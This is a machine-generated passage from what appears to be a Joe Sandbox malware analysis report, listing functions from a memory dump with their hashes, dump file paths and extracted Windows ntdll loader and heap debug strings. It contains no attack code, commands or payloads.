                                                                  • Instruction ID: 2ce2155451f21db3d350cbdf0c8c84abf512f60c063fe3897fe80272c42f7259
                                                                  • Opcode Fuzzy Hash: 5ac3880bbb9ccea92de451990046ed20ef84a01935e60ec9817ebc4c1a3abbd5
                                                                  • Instruction Fuzzy Hash: 214117B9645300ABD750DF68CC45B5B7BE8EF44764F01492AF958AB690EB3CE801CB92
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 378343D5 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121timeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  • LdrpCheckRedirection, xrefs: 3783450F
                                                                  • minkernel\ntdll\ldrredirect.c, xrefs: 37834519
                                                                  • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 37834508
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                  • API String ID: 3446177414-3154609507
                                                                  • Opcode ID: 844693514b81e3e72019530f6e7bc7a440da12803e2eac69724d28b9dd127c13
                                                                  • Instruction ID: d6a3208bf7b11c583711b0dffd22659779777b60734715125200b008012c18e2
                                                                  • Opcode Fuzzy Hash: 844693514b81e3e72019530f6e7bc7a440da12803e2eac69724d28b9dd127c13
                                                                  • Instruction Fuzzy Hash: A5418E7A607311AFFB10CE5CD940A3677E4AF68660F0506A9EC9CDB256D725EC01CBD1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 3788ACEB Relevance: 6.4, APIs: 4, Instructions: 450timeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID:
                                                                  • API String ID: 3446177414-0
                                                                  • Opcode ID: 3a95063141c739c0dd52992d97653ef893679ac9b3f744d0987559a4e7560ea1
                                                                  • Instruction ID: 92e38917afa0a415110663e30c0ca13a7791ea4603ca2e210d078947fb4319a2
                                                                  • Opcode Fuzzy Hash: 3a95063141c739c0dd52992d97653ef893679ac9b3f744d0987559a4e7560ea1
                                                                  • Instruction Fuzzy Hash: 3FF10776E00615AFCB18CF68C9D06BDFFF6AF98210B59416ED466DB380D634EA41CB50
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 377A7662 Relevance: 6.3, Strings: 5, Instructions: 51COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                                                  • API String ID: 0-3061284088
                                                                  • Opcode ID: 1f32a8a14277aa9dadfd561249e5b79ba87983cc8927561d11e78e4fd0f4a0b6
                                                                  • Instruction ID: ac35b9f340fa6b8b903f05c6580ad56bbb4d731e2e5e33cf72045087c6e48f00
                                                                  • Opcode Fuzzy Hash: 1f32a8a14277aa9dadfd561249e5b79ba87983cc8927561d11e78e4fd0f4a0b6
                                                                  • Instruction Fuzzy Hash: 47014C36065190FEF3858768EC4EFE27B94DB81770F14409EE4044F7A08F699844DD53
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 377B0485 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 135timeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 377B0586
                                                                  • kLsE, xrefs: 377B05FE
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                  • API String ID: 3446177414-2547482624
                                                                  • Opcode ID: 933e07452229fd8b5fd3b77290404773e31dbb25216a12cd7d8e612bfef8b1eb
                                                                  • Instruction ID: ae2e573cd6312de55dc4c1781af33a3f6c7ac31cb8ab8df1d986383a96569cba
                                                                  • Opcode Fuzzy Hash: 933e07452229fd8b5fd3b77290404773e31dbb25216a12cd7d8e612bfef8b1eb
                                                                  • Instruction Fuzzy Hash: 5151C0B5A0874ADFEB34DFA4C484BABB7F4AF44354F00883ED5959B640EB34A505CB62
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 377BB5E0 Relevance: 5.3, Strings: 4, Instructions: 303COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: LUx7$LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                                                                  • API String ID: 0-3926329107
                                                                  • Opcode ID: 461b2c76f130ae3c2f89d15d7963cb527f694ea9dda2a88c3eeca83527125039
                                                                  • Instruction ID: b1127d8877e39f8b097613f227fea15087dc962e7c036edc84074dab8cdd58bb
                                                                  • Opcode Fuzzy Hash: 461b2c76f130ae3c2f89d15d7963cb527f694ea9dda2a88c3eeca83527125039
                                                                  • Instruction Fuzzy Hash: 63B1AF75A017059FDB24CF69C894BAEB7B6AF68764F11482DE811EBBA0D730E840CF50
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 377BA2E0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                  • API String ID: 0-379654539
                                                                  • Opcode ID: 5de0d54e6f82754bec5e50d55adb97255094853a02a9b0f8532633e7248c2c7d
                                                                  • Instruction ID: 9edc9b2b251d359744dfbc99878b7ae8377eb1f965c0e14aa6fa3dcc72653113
                                                                  • Opcode Fuzzy Hash: 5de0d54e6f82754bec5e50d55adb97255094853a02a9b0f8532633e7248c2c7d
                                                                  • Instruction Fuzzy Hash: 82C18E74208382CFDB21DF19C084B6ABBE4FF89754F01496AF8958F250EB34DA49CB52
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 377E8322 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 377E8341
                                                                  • LdrpInitializeProcess, xrefs: 377E8342
                                                                  • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 377E847E
                                                                  • @, xrefs: 377E84B1
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                  • API String ID: 0-1918872054
                                                                  • Opcode ID: 187890c5ea3ab1b264375b463d72c772a9c2675065c5acf70feb51229070e263
                                                                  • Instruction ID: 47050a3541dd6fb28ca6febfc3c93b7b04944e8a7670ae908a78e9dfa719ae3b
                                                                  • Opcode Fuzzy Hash: 187890c5ea3ab1b264375b463d72c772a9c2675065c5acf70feb51229070e263
                                                                  • Instruction Fuzzy Hash: 9F918071509341AFE321CE60C944FAFBBECEB89794F40092DF9889A550E738D954DBA3
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 377E265C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 37821FE3, 378220BB
                                                                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 378220C0
                                                                  • SXS: %s() passed the empty activation context, xrefs: 37821FE8
                                                                  • .Local, xrefs: 377E27F8
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                  • API String ID: 0-1239276146
                                                                  • Opcode ID: 6a1225c8199a20e71f4d6ae6cdaadb9ed975778b4e1fba885076d29e44b21854
                                                                  • Instruction ID: 419134686b4c4571b4677531440b782caa9087c22025466d7b187da93887d253
                                                                  • Opcode Fuzzy Hash: 6a1225c8199a20e71f4d6ae6cdaadb9ed975778b4e1fba885076d29e44b21854
                                                                  • Instruction Fuzzy Hash: 3CA1BD7590072D9FDB20CF64C888B99B3B9BF28324F1105F9D808AB651DB30AE81CF91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 3784327E Relevance: 5.2, Strings: 4, Instructions: 236COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit$X}y7
                                                                  • API String ID: 0-4000489350
                                                                  • Opcode ID: e54ef0fca90e0c9808596377409e6c60c5213ca75ae41f6a8ab465e54d846f7c
                                                                  • Instruction ID: abd64ed0081b33ca5667b3117391c944c161fa500ad2d0d952405f37f2db6d1d
                                                                  • Opcode Fuzzy Hash: e54ef0fca90e0c9808596377409e6c60c5213ca75ae41f6a8ab465e54d846f7c
                                                                  • Instruction Fuzzy Hash: 70819075608345AFE311CF14D984B6EB7E8FF98760F80092DF954AB690DBB4E900CB52
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 377BB360 Relevance: 5.2, Strings: 4, Instructions: 221COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: LUx7$LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
                                                                  • API String ID: 0-2749471150
                                                                  • Opcode ID: 66d25d93d2332071ad58ba49cb5bba6ad3122f3c56e8fe714c1cab86f3897a49
                                                                  • Instruction ID: d41f22b5653903e88242ee4e778acf982c65075b8b003943d4ca9d860664742f
                                                                  • Opcode Fuzzy Hash: 66d25d93d2332071ad58ba49cb5bba6ad3122f3c56e8fe714c1cab86f3897a49
                                                                  • Instruction Fuzzy Hash: 9391A975A04349CBEF21CF58C8947ADB7B1AF04764F544599EC14AF2A0D778AE80CF92
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 377B63CB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 37810E72
                                                                  • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 37810EB5
                                                                  • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 37810DEC
                                                                  • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 37810E2F
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                  • API String ID: 0-1468400865
                                                                  • Opcode ID: d83a76f0b3226d8aabfea60143bd987e1b0443038ac1660dd407efb420738bcf
                                                                  • Instruction ID: 22750edc9cb8edfabb70be6fe0360f6988f5478eb7d39f1dcd67a68d6e18389a
                                                                  • Opcode Fuzzy Hash: d83a76f0b3226d8aabfea60143bd987e1b0443038ac1660dd407efb420738bcf
                                                                  • Instruction Fuzzy Hash: 8B71B3B59047049FDB60CF15C884F877BA9AF947A4F400969F9488B246D739D688CFD2
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 377AF5C7 Relevance: 5.2, Strings: 4, Instructions: 188COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                                  • API String ID: 0-2586055223
                                                                  • Opcode ID: 5617c9438d47b2acedd202b6d6bb5353881c7b1f79aa0bbfaa03e873c112a223
                                                                  • Instruction ID: e52ffdd5d4e520798a9ef842f9961351289d46fe7548d4fa95d3731dd444db0a
                                                                  • Opcode Fuzzy Hash: 5617c9438d47b2acedd202b6d6bb5353881c7b1f79aa0bbfaa03e873c112a223
                                                                  • Instruction Fuzzy Hash: 5561C075244780AFF311DA64CC48F6BB7A9EF847A4F040999F9648B291DB38E801CB62
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 37843608 Relevance: 4.1, Strings: 3, Instructions: 398COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: LdrpResSearchResourceHandle Enter$LdrpResSearchResourceHandle Exit$PE
                                                                  • API String ID: 0-1168191160
                                                                  • Opcode ID: c99bf173790e0a0ee79805ab277386b35383937944181fdcb43afa7c2825088d
                                                                  • Instruction ID: 1a2cda99fa2ccd6bcfe45d3ce61dc01ef3b58e16e7207834258db6495fbc5bfd
                                                                  • Opcode Fuzzy Hash: c99bf173790e0a0ee79805ab277386b35383937944181fdcb43afa7c2825088d
                                                                  • Instruction Fuzzy Hash: DDF190B5A0032C8BDB20CF18CC80BE9B7B5AF69764F8440E9D548B7640EBB59E85CF55
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 377B1380 Relevance: 4.1, Strings: 3, Instructions: 385COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • HEAP[%wZ]: , xrefs: 377B1632
                                                                  • HEAP: , xrefs: 377B14B6
                                                                  • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 377B1648
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                  • API String ID: 0-3178619729
                                                                  • Opcode ID: 8d684b1819e1c8e5207c971f8155910e5aa8c1d1c90e7b13b28a1c3f7cc096f1
                                                                  • Instruction ID: 4555b6af3f3f33efe0daa934ff4f96ac1c8b8f39ec4ccf5596be4729dcca30aa
                                                                  • Opcode Fuzzy Hash: 8d684b1819e1c8e5207c971f8155910e5aa8c1d1c90e7b13b28a1c3f7cc096f1
                                                                  • Instruction Fuzzy Hash: 6FE1D074A04745AFEB24CF28C891B7ABBE2AF58314F14C85DE496CF245EB34E941CB50
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 377DF4D0 Relevance: 4.1, Strings: 3, Instructions: 382COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 378200C7
                                                                  • RTL: Re-Waiting, xrefs: 37820128
                                                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 378200F1
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                  • API String ID: 0-2474120054
                                                                  • Opcode ID: e3a828360df22ae1c73334379673c5be8b81a381f85cd3040b4b2a4d457afb14
                                                                  • Instruction ID: 3bd0967a7c44dfd223b7cf842b9f036f281c7f002ac037cbf0bfaf518688f42a
                                                                  • Opcode Fuzzy Hash: e3a828360df22ae1c73334379673c5be8b81a381f85cd3040b4b2a4d457afb14
                                                                  • Instruction Fuzzy Hash: C6E1DF74608741DFE711CF28C894B1AB7E1BF84368F100A6DF5A58B2E1DB75E986CB42
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 3783330C Relevance: 4.0, Strings: 3, Instructions: 292COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                                                  • API String ID: 0-2391371766
                                                                  • Opcode ID: 87fa847defb49f758843198938f2f12edbde445a9e122a2c3b7ee9dd515eaa22
                                                                  • Instruction ID: 4ddbc09cc0f389be3e5a09afb905c8020a4fbc675b9bbde9dc3ecaa85a04336d
                                                                  • Opcode Fuzzy Hash: 87fa847defb49f758843198938f2f12edbde445a9e122a2c3b7ee9dd515eaa22
                                                                  • Instruction Fuzzy Hash: 2AB1E279606305AFF311CF58CC85F6BB7E8AB58760F050929FA509B690DB79E804CBD2
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 377AA147 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: FilterFullPath$UseFilter$\??\
                                                                  • API String ID: 0-2779062949
                                                                  • Opcode ID: 71b9576f1fa73687e2449fe1000b5c442c2f912c66e7000bc1cdcbcd4b282228
                                                                  • Instruction ID: 74d8d0dd512f798ee84a43a24f1177bcff729d584b52d68f8ad086973ecf6a88
                                                                  • Opcode Fuzzy Hash: 71b9576f1fa73687e2449fe1000b5c442c2f912c66e7000bc1cdcbcd4b282228
                                                                  • Instruction Fuzzy Hash: FDA16175901229ABEB21DF64CC88BDEB7B8EF04714F1105EAE908AB250D735AEC5CF51
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 3788B2BC Relevance: 3.9, Strings: 3, Instructions: 180COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • GlobalizationUserSettings, xrefs: 3788B3B4
                                                                  • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 3788B3AA
                                                                  • TargetNtPath, xrefs: 3788B3AF
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                                                  • API String ID: 0-505981995
                                                                  • Opcode ID: ad15666378857e309358fb20c971ee40180aa3773c01af1081e0f8fd70024595
                                                                  • Instruction ID: 19279bb0cf79232594a4ccc980151c47e4da2c759c9ddf7ab78d0cc4bc841da0
                                                                  • Opcode Fuzzy Hash: ad15666378857e309358fb20c971ee40180aa3773c01af1081e0f8fd70024595
                                                                  • Instruction Fuzzy Hash: 7961B572D41229ABDB21DF58DC89BD9BBB8AF58710F4101E5E518AB250C734EE84CF91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 377AF75B Relevance: 3.9, Strings: 3, Instructions: 167COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • HEAP[%wZ]: , xrefs: 3780E435
                                                                  • HEAP: , xrefs: 3780E442
                                                                  • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 3780E455
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                                  • API String ID: 0-1340214556
                                                                  • Opcode ID: 47de0426b45958e50537be9a93388fa9c8006fc4beca05d2d2ecf55eb4a0bea5
                                                                  • Instruction ID: e0e68508ed6c352fc1d7b8b9df75c440ff61cc663620037c8e88521c4bead8a2
                                                                  • Opcode Fuzzy Hash: 47de0426b45958e50537be9a93388fa9c8006fc4beca05d2d2ecf55eb4a0bea5
                                                                  • Instruction Fuzzy Hash: 0E51D275604B84EFF312CBA8C888FAABBF8EF04754F0446A5E5509B792D778E901CB51
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 377D1514 Relevance: 3.9, Strings: 3, Instructions: 166COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • LdrpCompleteMapModule, xrefs: 3781A39D
                                                                  • Could not validate the crypto signature for DLL %wZ, xrefs: 3781A396
                                                                  • minkernel\ntdll\ldrmap.c, xrefs: 3781A3A7
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
